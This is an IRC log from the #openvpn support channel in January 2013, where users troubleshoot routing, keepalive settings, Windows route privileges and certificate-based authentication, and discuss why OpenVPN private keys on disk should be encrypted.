I'd just do without it personally 10:57 < genghi1> heh, I'll add a comment but use awk or something to re-process the rules to delete them by rule number 10:57 < genghi1> no biggie 11:00 -!- bakedin [~qjkh@111.192.134.20] has quit [Ping timeout: 245 seconds] 11:02 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn 11:03 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Client Quit] 11:04 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has quit [Ping timeout: 264 seconds] 11:06 -!- Azrael808 [~peter@212.161.9.162] has quit [Ping timeout: 276 seconds] 11:09 < con3x> Woo, finally solved my problem 11:10 -!- raidz_away is now known as raidz 11:10 < con3x> Apparently I needed to add "route-nopull" to my config and just configure all my routes automatically 11:11 < con3x> /s/automatically/manually 11:12 <+pekster> Well, it's automatic after you manually script it :P 11:14 < con3x> Yeah :) I wrote a python script to do the DNS lookups :P need to do some packet inspection to see what pandora and hulu talk to now. 11:15 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has joined #openvpn 11:15 < fu_fu> hi 11:15 < con3x> hi fu_fu. 11:17 < fu_fu> can "--ping-exit n" be used in the current version? and can it be used on the client side, or was it replaced "keepalive"? should keepalive be used on the client side? 
11:17 < fu_fu> ^^ i mean --ping-restart 11:18 < fu_fu> from the manpage it looks like keepalive is the new way to do it, maybe i just need to know if you have to put it on both sides 11:20 <+pekster> fu_fu: --ping needs to be on the opposite side from a --ping-restart or --ping-exit option 11:21 <+pekster> --keepalive is just a helper-directive to set both at once with values as described in the manpage; it's a helper-directive that expands to others 11:21 < fu_fu> thx for the clarification 12:25 -!- b1rkh0ff [~b1rkh0ff@178.77.8.47] has quit [Ping timeout: 252 seconds] 12:32 -!- Orbi [~opera@anon-186-110.vpn.ipredator.se] has joined #openvpn 12:38 -!- b1rkh0ff [~b1rkh0ff@178.77.1.200] has joined #openvpn 12:48 -!- nutron|w [~nutron@unaffiliated/nutron] has quit [Quit: I must go eat my cheese!] 13:03 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has quit [Ping timeout: 276 seconds] 13:06 -!- Porkepix [~Porkepix@ppp-seco11pa2-46-193-129.224.wb.wifirst.net] has joined #openvpn 13:27 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 245 seconds] 13:30 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 13:31 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn 13:50 -!- pelle2 [~p@178-132-78-93.cust.azirevpn.net] has quit [Ping timeout: 276 seconds] 13:51 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has quit [Changing host] 13:51 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn 13:51 -!- mode/#openvpn [+o novaflash] by ChanServ 13:59 -!- deed02392 is now known as Daedy 14:01 -!- Orbi [~opera@anon-186-110.vpn.ipredator.se] has left #openvpn [] 14:09 <+hazardous> goodbye orbi. 14:24 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has joined #openvpn 14:26 -!- sukosevato is now known as Cpt-Oblivious 14:36 -!- genghi1 [~Adium@p5089BF98.dip.t-dialin.net] has quit [Quit: Leaving.] 
14:45 -!- bsdgeek [~bsdgeek@91-66-20-106-dynip.superkabel.de] has quit [Quit: ByeBye]
15:13 -!- mikkel [~mikkel@80-71-132-15.u.parknet.dk] has quit [Quit: Leaving]
15:23 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has joined #openvpn
15:25 -!- gffa [~unknown@unaffiliated/gffa] has joined #openvpn
15:35 -!- pekster [~rewt@openvpn/user/pekster] has quit [Ping timeout: 255 seconds]
15:35 -!- pekster [~rewt@openvpn/user/pekster] has joined #openvpn
15:35 -!- mode/#openvpn [+v pekster] by ChanServ
15:37 -!- nutron|w [~nutron@24.67.96.21] has joined #openvpn
15:38 -!- nutron|w [~nutron@24.67.96.21] has quit [Changing host]
15:38 -!- nutron|w [~nutron@unaffiliated/nutron] has joined #openvpn
15:41 -!- nutron is now known as Guest25591
15:44 -!- nutron|w is now known as nutron
15:51 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- In tests, 0x09 out of 0x0A l33t h4x0rz prefer it :)]
15:52 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn
15:52 -!- KaiForce [~chatzilla@adsl-70-228-65-227.dsl.akrnoh.ameritech.net] has quit [Quit: ChatZilla 0.9.89 [Firefox 18.0/20130104151925]]
15:56 < dioz> for server bridge
15:56 < dioz> in the instance there is only one client
15:56 < dioz> and one ip in the "pool"
15:57 < dioz> can i use server-bridge 10.8.0.4 255.255.255.0 10.8.0.4 10.8.0.4
16:14 -!- cjs226 [~cjs226@99-42-101-89.lightspeed.austtx.sbcglobal.net] has quit []
16:28 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has joined #openvpn
16:59 -!- cjs226 [~cjs226@99-61-64-43.lightspeed.austtx.sbcglobal.net] has joined #openvpn
17:01 -!- gladiatr [~sdspence@openvpn/community/support/gladiatr] has quit [Quit: Leaving]
17:17 -!- Devastator [~devas@unaffiliated/devastator] has quit [Read error: Connection reset by peer]
17:18 -!- Devastator [~devas@186.214.14.9] has joined #openvpn
17:18 -!- Devastator [~devas@186.214.14.9] has quit [Changing host]
17:18 -!- Devastator [~devas@unaffiliated/devastator] has joined #openvpn
17:22 -!- Azrael808 [~peter@cpc17-walt12-2-0-cust657.13-2.cable.virginmedia.com] has quit [Ping timeout: 245 seconds]
17:37 -!- swat [~swat@ubuntu/member/swat] has quit [Quit: Leaving.]
17:40 -!- blackness [~black@ip98-185-21-138.rn.hr.cox.net] has joined #openvpn
17:40 < blackness> to set a list of IPs for the allowed connection, should i allow * via the program and filter iptables or the other way around?
17:41 <+hazardous> why not both?
17:41 -!- MagisterQuis [~MagisterQ@unaffiliated/kd5pbo] has left #openvpn []
17:41 < blackness> little wasteful don'tcha think?
17:42 < blackness> plus does the .conf accept CIDR settings?
17:55 -!- ddaydj [~ddaydj@rrcs-66-91-144-147.west.biz.rr.com] has joined #openvpn
17:57 < ddaydj> hello. so is there a trick to get the community client to push routes on windows without running as admin?
17:59 < ddaydj> i can connect to the vpn with the community client, but no routes unless i run as admin. i've used the access server client with another vpn and that pushes routes, but for some reason, i can't connect to this new vpn server i setup with that client
18:03 < blackness> what about disabling ACLs?
18:03 < blackness> or set the program to run as admin by default?
18:07 < ddaydj> that would still require an admin password that the user won't have
18:08 < blackness> no it won't, you add the program into the ACL..unless you have some weird setup..only time i use windows is when i fix others' computers lol.
18:10 < ddaydj> i'm not sure how well that will work. i'll look into it tho
18:10 < ddaydj> some of the client computers will not be ones that are administrated by other companies so i'm not sure how they'll like that idea
18:11 < ngharo> i'd setup the VPN on a gateway then
18:11 < ddaydj> the server? or the client?
18:12 -!- b1rkh0ff [~b1rkh0ff@178.77.1.200] has quit [Ping timeout: 248 seconds]
18:12 < ngharo> client
18:12 < ddaydj> like set it as the default gateway on the workstation?
18:12 < ngharo> like connect the default gateway up to your vpn server
18:13 < ddaydj> that's not an option. my clients are going to be laptops at people's homes and workstations inside vendors' networks
18:14 < ngharo> i see
18:14 -!- brute11k [~brute11k@89.249.235.236] has quit [Quit: Leaving.]
18:15 < ngharo> http://openvpn.net/index.php/open-source/documentation/install.html?start=1
18:15 <@vpnHelper> Title: Installation Notes - Installation (Win32) (at openvpn.net)
18:15 < ngharo> describes running openvpn as a service
18:16 < ddaydj> i'm familiar with doing that, but that's an always-on thing. limited user accounts can't start and stop services
18:17 -!- Cpt-Oblivious [sukosevato@a202101.upc-a.chello.nl] has quit []
18:17 < ddaydj> in the case of the access server client, it has a service installed which i think is what it uses to push the routes when connecting from a limited user account
18:17 < ddaydj> afk for a minute
18:22 < ddaydj> so can you guys help with troubleshooting the access server client? or is that the other channel?
18:29 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has quit [Read error: Operation timed out]
18:29 -!- kingtuna [~tuna@173-162-122-197-miami.hfc.comcastbusiness.net] has joined #openvpn
18:41 -!- ddaydj [~ddaydj@rrcs-66-91-144-147.west.biz.rr.com] has quit []
18:45 -!- donhoe [~jeepers@c-69-247-138-234.hsd1.tn.comcast.net] has joined #openvpn
18:52 -!- ikonia [~irc@unaffiliated/ikonia] has quit [Read error: Operation timed out]
18:52 -!- ikonia [~irc@unaffiliated/ikonia] has joined #openvpn
19:12 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has quit [Read error: Connection reset by peer]
19:31 -!- JPeterson [~JPeterson@s213-103-211-58.cust.tele2.se] has joined #openvpn
19:54 < ngharo> !as
19:54 <@vpnHelper> "as" is please go to #OpenVPN-AS for help with Access-Server
19:57 -!- gffa [~unknown@unaffiliated/gffa] has quit [Quit: sleep]
19:57 -!- raidz is now known as raidz_away
20:06 -!- p3rror [~mezgani@2001:0:53aa:64c:2cea:7a37:d673:480f] has joined #openvpn
20:11 -!- holmen_ [~holmen@h-30-250.a176.priv.bahnhof.se] has joined #openvpn
20:14 -!- holmen [~holmen@h-30-250.a176.priv.bahnhof.se] has quit [Ping timeout: 260 seconds]
20:17 -!- EugeneKay [eugene@go-without.me] has quit [Remote host closed the connection]
20:18 -!- EugeneKay [eugene@go-without.me] has joined #openvpn
20:36 <+dvl> http://dan.langille.org/2013/01/15/how-not-to-order-ram-for-your-motherboard/
20:53 < EugeneKay> I've done that.
20:56 -!- p3rror [~mezgani@2001:0:53aa:64c:2cea:7a37:d673:480f] has quit [Ping timeout: 260 seconds]
21:55 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
21:56 < kunji> !welcome
21:56 <@vpnHelper> "welcome" is (#1) Start by stating your goal, such as 'I would like to access the internet over my vpn' || new to IRC? see the link in !ask || we may need !logs and !configs and maybe !interface to help you. || See !howto for beginners. || See !route for lans behind openvpn. || !redirect for sending inet traffic through the server. || Also interesting: !man !/30 !topology !iporder !sample !forum
21:56 <@vpnHelper> !wiki !mitm or (#2) Don't use 192.168.1.0/24 or 192.168.0.0/24 (too much potential for conflict)
21:56 < kunji> !goal
21:56 <@vpnHelper> "goal" is Please clearly state your goal for your vpn: example, I would like to access the lan behind the server , I would like to access the internet over my vpn , I just want a secure connection between 2 computers , etc
21:56 < kunji> !howto
21:56 <@vpnHelper> "howto" is (#1) OpenVPN comes with a great howto, http://openvpn.net/howto PLEASE READ IT! or (#2) http://www.secure-computing.net/openvpn/howto.php for a mirror
21:58 < kunji> !route
21:58 <@vpnHelper> "route" is (#1) http://www.secure-computing.net/wiki/index.php/OpenVPN/Routing or https://community.openvpn.net/openvpn/wiki/RoutedLans (same page mirrored) if you have lans behind openvpn, read it DONT SKIM IT or (#2) READ IT DONT SKIM IT! or (#3) See !tcpip for more info about a more basic networking guide
21:59 -!- fu_fu [~Adium@c-71-200-223-226.hsd1.fl.comcast.net] has quit [Quit: Leaving.]
23:26 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
23:28 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds]
23:50 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
23:52 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 246 seconds]
23:55 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
23:58 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 245 seconds]
--- Day changed Wed Jan 16 2013
00:06 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
00:09 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 248 seconds]
00:30 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
00:32 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 248 seconds]
00:33 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
00:35 -!- arekm [~arekm@pld-linux/arekm] has quit [Read error: Connection reset by peer]
00:35 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 252 seconds]
00:38 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
00:40 -!- dioz [~dioz@2001:470:d:e3::1] has quit [Read error: Connection reset by peer]
00:41 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 255 seconds]
00:43 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
00:44 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 246 seconds]
00:47 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
00:47 -!- dioz [~dioz@2001:470:d:e3::1] has joined #openvpn
00:48 -!- emmanuelux [~emmanuelu@vau92-2-82-228-217-1.fbx.proxad.net] has quit [Remote host closed the connection]
00:49 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 264 seconds]
00:51 -!- Orbi [~opera@109.129.7.235] has joined #openvpn
00:56 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
00:58 -!- Orbi [~opera@109.129.7.235] has quit [Ping timeout: 245 seconds]
00:59 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 264 seconds]
00:59 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
01:00 -!- brute11k [~brute11k@89.249.235.236] has joined #openvpn
01:01 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds]
01:17 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
01:20 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 255 seconds]
01:28 -!- UberDuper [~UberDuper@wsip-174-77-66-158.ph.ph.cox.net] has quit [Read error: Connection reset by peer]
01:28 -!- UberDuper [~UberDuper@wsip-174-77-66-158.ph.ph.cox.net] has joined #openvpn
01:38 -!- swat [~swat@ubuntu/member/swat] has joined #openvpn
01:44 -!- bauruine [~stefan@91.236.116.112] has quit [Ping timeout: 248 seconds]
01:51 -!- afuentes [~afuentes@213.37.131.197.static.user.ono.com] has joined #openvpn
01:52 -!- b1rkh0ff [~b1rkh0ff@178.77.1.200] has joined #openvpn
01:57 -!- ade_b [~Ade@109.58.215.97.bredband.tre.se] has joined #openvpn
01:57 -!- ade_b [~Ade@109.58.215.97.bredband.tre.se] has quit [Changing host]
01:57 -!- ade_b [~Ade@redhat/adeb] has joined #openvpn
02:02 -!- tuxick [~userMurf@tuxick.xs4all.nl] has left #openvpn []
02:04 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 245 seconds]
02:05 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
02:07 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has joined #openvpn
02:07 -!- Saviq_ [~Saviq@89-70-82-159.dynamic.chello.pl] has quit [Remote host closed the connection]
02:11 -!- joako [~joako@opensuse/member/joak0] has joined #openvpn
02:12 < joako> Is there any way I can fully integrate the OpenVPN client with Windows, so the user doesn't need to type their password twice?
02:15 <+pekster> joako: Not really. You might be able to use some creative PKCS11 (ie: smart card) scenario if you're already using smartcards to log users in locally
02:16 < joako> What if I set it up with certificates only? Could I issue the certificates automatically through Windows and load the CA into OpenVPN server?
02:17 <+pekster> Optionally, you could store the required password somewhere that uses whatever programming APIs Windows gives you to decrypt it and pass it back on the management interface. An inferior version of that approach is to store the password in plaintext inside an EFS or bitlocker-protected folder, but that's usually a bad idea since any malware would have access to the decrypted version
02:17 <+pekster> joako: Same problem, basically, unless you're willing to keep unencrypted private keys on the laptop (which is trivial for an attacker who knows what they're doing to swipe from a non-disk-encrypted PC in just a couple of minutes)
02:17 -!- joako_ [~joako@opensuse/member/joak0] has joined #openvpn
02:18 <+pekster> Traditionally, you encrypt the private key so such a compromise as I noted above doesn't occur due to exposure of the key file
02:21 < joako_> I don't know how Windows handles storing the certificates -- and quite frankly I don't care. Could OpenVPN use the certificates stored in Windows directly?
02:21 -!- joako [~joako@opensuse/member/joak0] has quit [Ping timeout: 245 seconds]
02:22 <+pekster> No
02:23 <+pekster> OpenVPN does not use the "Certificate Manager" keystore
02:23 <+pekster> It supports only keypairs via flat-files and PKCS11 providers
02:27 < joako_> Actually I am reading here and it does appear possible. The only issue would be to generate a cryptoapicert that would be universal to all machines
02:28 < kunji> joako: mind linking what you're reading?
02:28 <+pekster> joako_: Oh, I stand corrected. See the --cryptoapicert option in the manpage
02:29 < joako_> 1) http://serverfault.com/questions/38528/openvpn-with-a-windows-certificate-services-pki 2) http://www.mentby.com/Group/openvpn-users/cryptoapicert-and-windows-7.html etc
02:29 <@vpnHelper> Title: vpn - OpenVPN with a Windows Certificate Services PKI - Server Fault (at serverfault.com)
02:31 <+pekster> joako_: So, you can import the pkcs12 file containing both keys. I don't know what you're going on about generating a universal cert, because that doesn't appear to be required or something you'd want in such a setup
02:32 < joako_> pekster: No I would deploy the certificate through Windows autoenrollment but I would need the OpenVPN configuration to be identical for every machine so I don't need to manage that
02:33 <+pekster> That gets a little messy, because *all* certs signed by the CA (even the ones for computer$ accounts, etc) will be seen as valid accounts. Additionally, since you presumably don't generate CRLs every time you un-join a computer or remove an AD user, old keypairs from terminated employees would be valid VPN credentials
02:33 <+pekster> You could do some magic on the server-side I suppose via ccd files or using the key subject or fingerprint or something, but that sounds like a lot of work on your end to code that
02:34 <+pekster> Maybe you can get Windows auto-enrollment to use a special CA with a PKI specifically for VPN access, but you still need to deal with revocation or otherwise verifying a cert belongs to an active user that should have access
02:35 <+pekster> I have very limited experience with server-side certificate services in AD
02:38 <+pekster> joako_: Oh, and see the note in your 2nd link too about the scope of the program execution; normal users (even when they are "administrators") under UAC can't add routes, so OpenVPN runs as the actual 'administrator' user. Choices to get around that are 1) disable UAC or 2) as the reply there suggests, add the keypair to the 'administrator' keystore on the PC, not the user keystore (which probably screws up your auto-enrollment options)
02:38 <+pekster> How's that for some required reading? ;)
02:40 -!- kunji1 [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has joined #openvpn
02:43 -!- kunji [~kunji@c-68-60-83-138.hsd1.mi.comcast.net] has quit [Ping timeout: 256 seconds]
02:43 < kunji1> Hmm, I don't know the application here exactly, but would it be acceptable to just not use passwords? Windows will be doing your security, so if they can login then they can get on the VPN right? So then, why not just use certs without passwords? I'm new to VPN, so.. don't bash this noob too hard :P
02:43 <+pekster> kunji1: What do you mean "windows will be doing your security"?
02:44 <+pekster> You either need to auth users by --auth-user-pass-verify or by X509
02:45 <+pekster> Yes, you can use X509 via PKCS11 or the cryptoapicert features, but I just identified all the complicating factors with the cryptoapicert features on recent (>=Vista) versions
02:46 <+pekster> kunji1: Unless you mean leave the key unencrypted on the hard disk. Ask your friendly neighborhood hacker you trust to show you how fast they can pull files off your hard disk some time ;)
02:47 <+pekster> (malware is also a threat, even if you do bitlocker encryption of your disk, so no trying to squirm out on that technicality either)
02:47 <+pekster> Java 0-day anyone? ;)
02:48 < kunji1> pekster: mind going through the standard process real quick for me then? I was likening it to passwordless ssh setup in my head, but that may not be applicable here.
02:49 < joako_> So then OpenVPN is not secure?
02:50 < kunji1> joako_: It's secure, unless you really botch your config.
02:51 < joako_> kunji1: I currently have a standard config and the keys are just stored on my hard drive
02:53 -!- pppingme [~pppingme@unaffiliated/pppingme] has quit [Ping timeout: 245 seconds]
02:53 < kunji1> joako_: Well, the thing about that is, as pekster was saying, that the security is only as good as that of your OS in that situation.
02:56 -!- pppingme [~pppingme@unaffiliated/pppingme] has joined #openvpn
03:00 <+pekster> kunji1: you mean pubkey ssh auth? OpenVPN's X509 support is exactly like that, except it uses X509 for delegating trust
03:00 <+pekster> CryptoAPI just keeps the plaintext cert in the keystore and encrypts it itself
03:01 <+pekster> It's a fine way to store it (provided you trust the encryption and SSO scheme it uses) but the issue is generating it automatically to the keystore and calling it for OpenVPN
03:01 < kunji1> pekster: Hmm, so you're fine as long as your files are secure; of course this becomes much harder as soon as we're not just talking about my files, but everyone at a company... and on windows as well.
03:02 -!- bauruine [~stefan@91.236.116.112] has joined #openvpn
03:02 <+pekster> kunji1: What are you going on about? Yes, files can be stolen a variety of ways, even more so from unencrypted disks. This is why your ssh private key is encrypted with a passphrase, and so should your on-disk OpenVPN keys be
03:04 < kunji1> pekster: I'm referring to the case where you need to automate ssh communication between servers.
03:05 <+pekster> Then yes, if you're doing that non-interactively you need to store unencrypted keys somewhere, or store the decryption password in plaintext somewhere (not really any better)
03:06 <+pekster> Hopefully people doing that have hardened their systems as much as possible and limited the ssh key usage on the remote end to the specific command that it needs to perform (as is the recommendation)
03:13 < kunji1> pekster: Yes indeed, that's something I'm much more familiar with than vpn. Hmm, ... the openvpn documentation could really have been more explicit about that, it's mentioned in a pretty nonchalant manner (about passwords). Same for the Ubuntu documentation on installing openvpn.... I don't think that mentions it at all.
03:13 <+pekster> Same with ssh, if you get down to it. If you're handling private keys or pkcs12 files, you presumably know what you're doing
03:14 <+pekster> It's rare to find an average user who knows how to use 'openssl rsa' commands that is completely ignorant of what they're doing
03:16 -!- Castorrr [Castor_@CPE-72-133-200-232.wi.res.rr.com] has quit []
03:33 < kunji1> pekster: .. so I'm still missing the part where we decided RAM is so secure if the HD isn't...
03:36 -!- kobolduk [~kobolduk@office.prolocation.net] has joined #openvpn
03:37 -!- joako_ [~joako@opensuse/member/joak0] has quit [Ping timeout: 245 seconds]
03:37 -!- Azrael808 [~peter@212.161.9.162] has joined #openvpn
03:43 <+pekster> kunji1: RAM can't be (easily) attacked offline
03:44 <+pekster> If you power off, the RAM is dead. The encrypted cert is safe, provided it's encrypted such that brute-force is non-trivial
03:44 <+pekster> Boom. Next security problem?
03:45 <+pekster> (and honestly, if you're worried about someone flash-freezing your DRAM chips, you should keep your laptop on you at all times and a loaded firearm in your hand)
03:45 <+pekster> !shotgun
03:45 <@vpnHelper> "shotgun" is (#1) the most effective form of physical security or (#2) shotgun security? If you try to physically attack my network, I chase you with a shotgun.
03:45 < kunji1> Of course, I was assuming online; offline is possible, but as you say, it's nontrivial.
03:45 <+pekster> keys aren't kept in RAM unless you specify --persist-key
03:45 <+pekster> They're re-read from disk each time they're required
03:46 <+pekster> (session keys are of course in RAM, but those rotate hourly by default)
03:48 < kunji1> Hmm, they're read into RAM though right, when required, and then that RAM is freed or overwritten?
03:52 < con3x> What is a good channel to ask a question about kernel routes? Some of my routes seem to be ignored and the default route is taken.
03:53 < con3x> I'm sure the routes are set up correctly and they appear to work in some cases, enough to start watching a video on netflix.
03:53 < kunji1> ##networking is a good place to ask, make sure to post your routes for them, and which ones seem to be ignored.
03:53 < con3x> Thanks :)
03:56 -!- Minnebo [~Minnebo@78-20-135-159.access.telenet.be] has joined #openvpn
04:01 < kunji1> pekster: Shotgun approach is nice :P About the flash freezing, well there are easier ways to get at the RAM, it does need to be an initially powered on system (assume locked or whatnot), but depending on exactly what hardware it is (and even the luck of manufacturing tolerances really) it can be possible to reboot the machine and get a good dump of the RAM contents to say a USB. This is of course typically easy to stop by not having the c
04:02 <+pekster> Sure. I'm unclear how this has to do with not storing your plaintext key on a disk somewhere
04:02 -!- joako_ [~joako@99-153-161-249.lightspeed.miamfl.sbcglobal.net] has joined #openvpn
04:02 -!- joako_ [~joako@99-153-161-249.lightspeed.miamfl.sbcglobal.net] has quit [Changing host]
04:02 -!- joako_ [~joako@opensuse/member/joak0] has joined #openvpn
04:02 <+pekster> OpenVPN can't protect you from RAM-reading attacks (online or offline.) OpenVPN can leverage openssl's ability to decrypt RSA keys on the fly, however
04:04 -!- Minnebo_ [~Minnebo@78-20-132-224.access.telenet.be] has joined #openvpn
04:04 -!- Minnebo [~Minnebo@78-20-135-159.access.telenet.be] has quit [Ping timeout: 240 seconds]
04:04 <+pekster> It's the difference between leaving your housekey on top of your doormat and putting it in one of those locked key boxes for the realtor to access
04:04 <+pekster> Pick how you want to secure access to your network ;)
04:05 < kunji1> pekster: It doesn't at this point, not precisely. I was tending towards saying that RAM and HD security are not terribly different, but I suppose I see the point in the case of, say, theft or misplacement of devices.
04:06 -!- Minnebo__ [~Minnebo@78-20-132-224.access.telenet.be] has joined #openvpn
04:06 <+pekster> Or a java 0-day that breaks out of its sandbox and copies your c:\secret\my-unencrypted-key.key file to a dropbox account
04:06 < kunji1> Hmm, I like the analogy :P, can't I take my key with me T.T
04:06 <+pekster> That's much less bad than if your key was encrypted
04:06 <+pekster> w/than if/when/
04:07 <+pekster> s@w/@s/@
04:07 <+pekster> :(
04:07 <+pekster> Stealing files isn't just for physical theft anymore! ;)
04:08 * Wintereise steals pekster.
04:08 <+pekster> I'd better revoke my certificate and publish a CRL for myself :P
04:08 < kunji1> Yeah, I need to sleep... that's what I'm going to blame for whenever I say something stupid in here (it is 5 A.M. where I am).
04:08 < Wintereise> :x
04:09 -!- Minnebo_ [~Minnebo@78-20-132-224.access.telenet.be] has quit [Ping timeout: 245 seconds]
04:09 < con3x> Got no response in #networking :( so:
04:09 < con3x> Hello there, I'm having a small problem with routes, I'm trying
04:09 < con3x> to route certain ip addresses through an OpenVPN server, but
04:09 < con3x> some aren't actually passing through and are just going out over
04:09 < con3x> the default gateway; here is the output of ip route show:
04:09 < con3x> http://pastebin.com/z0KtdEAW. Can anybody see any problems with
04:09 < kunji1> I've heard enough about CRL..... stupid vehicular networks
04:10 <+pekster> protip: space after your URLs
04:10 <+pekster> (many consoles like to select-by-word and include them)
04:11 < con3x> I'll keep that in mind :)
04:11 <+pekster> So what, a destination matching one of those routes isn't sent across tun0, I presume?
04:11 < kunji1> Yeah, I never know what to do about the end of the sentence when that happens, usually I end up just leaving out the period altogether.
04:11 <+pekster> Example: http://google.com . More sample info about google goes here
04:11 <@vpnHelper> Title: Google (at google.com)
04:12 < con3x> http://pastebin.com/z0KtdEAW
04:12 <+pekster> Got it ;)
04:12 <+pekster> So, my question?
04:13 < con3x> Yeah, instead it just goes over a default route (if I run traceroute)
04:13 < con3x> I'll run one just now
04:13 <+pekster> Can you verify 'ip route get $target_ip' shows the tun0 exit/src?
04:14 < kunji1> Yeah, pekster, that's what I was asking about the other day, couldn't I just make all the traffic go over the vpn by setting the appropriate routes?
04:14 <+pekster> kunji1: If you can route by destination IP, yes. I forget what your specific issue was
04:14 -!- Mimiko [~Mimiko@89.28.88.177] has joined #openvpn
04:16 < con3x> I think I may have just solved my own problem
04:18 < con3x> It's going out over the WAN, but the IPs seem to be different when I resolve them in python than when I run a traceroute
04:19 <+pekster> round-robin or low-TTL values will do that; don't rely on DNS in such cases
04:19 <+pekster> (or even a high TTL if the value changes between when you resolve it and the client does so again later)
04:19 <+pekster> IP-based route overrides are the wrong way to do web filtering, if that's your goal
04:21 < con3x> Just trying to get around localization guards for netflix.
04:22 <+pekster> Web proxy too hard?
04:23 <+pekster> I *think* silverlight respects the browser proxy setting (it'd have to for locations that require a proxy for outbound Internet access at the very least)
04:24 < con3x> Won't work on all the devices in the network :) also I want it to selectively route so the video images etc come off the CDN
04:25 < kunji1> pekster: Hmm, well I was trying to setup a bridged connection to that effect. I was able to try it today outside my network, and it wasn't working... It would connect with no errors, but no traffic was going over the vpn. Tried it again when I got home, but at that point I was inside my network again... so I don't think the return routing for packets was correct for when I'm connecting outside of my network. So I think I needed to add
04:25 <+pekster> Remind me again why you don't just use tun?
04:27 -!- joako_ [~joako@opensuse/member/joak0] has quit [Read error: Connection reset by peer]
04:28 -!- Minnebo__ [~Minnebo@78-20-132-224.access.telenet.be] has quit [Ping timeout: 252 seconds]
04:29 < kunji1> pekster: games, though we were considering a 2 daemon solution, but I'm not sure if it's accessing even the server right now, let alone the internet. That is, it would claim to connect fine, but I'm not able to ping the server or any other machines on the LAN. I've changed some settings, so I'm going to try again tomorrow, and if that doesn't work I'll be bringing the logs etc..
04:30 < con3x> Apparently the DNS entries for cbp-us.nccp.netflix.com change in seconds
04:30 <+pekster> Ah, k. If you can't ping your LAN, you need to verify the addressing is correct on the client interface, and if it is, check your firewalls and bridge setup for errors. tcpdump/wireshark things liberally if you get stuck
04:31 -!- tMobile4a03 [~T4@n218250229105.netvigator.com] has joined #openvpn
04:31 < con3x> Either that or I'm doing my lookup wrong
04:32 <+pekster> Are you pulling all the A records returned?
04:33 <+pekster> It might still rotate within a larger set of IPs, but I get 8 IPs back for a dig request there
04:34 < con3x> Same here, just looking a little deeper. that domain itself has only a CNAME record
04:34 -!- tyteen4a03 [T4@n218250229105.netvigator.com] has quit [Ping timeout: 252 seconds]
04:34 < con3x> Which as far as I can tell routes to a rotating base of AWS servers
04:35 < kunji1> Can addressing on the server be incorrect? Because my guess was server addressing, and that's what I tried changing to test tomorrow. firewalls are disabled while testing. The bridge itself appears to be just fine (it comes up without any errors and I can ping everything from that machine). Ah good ol wireshark... I do need to learn how to use that properly, every actual network I'm on they would get really pissed about it though (mai
04:35 < con3x> I might just tell DNSMasq to forward only to those 8 and see how long it works for...
04:35 < con3x> /s/forward/return the ips for
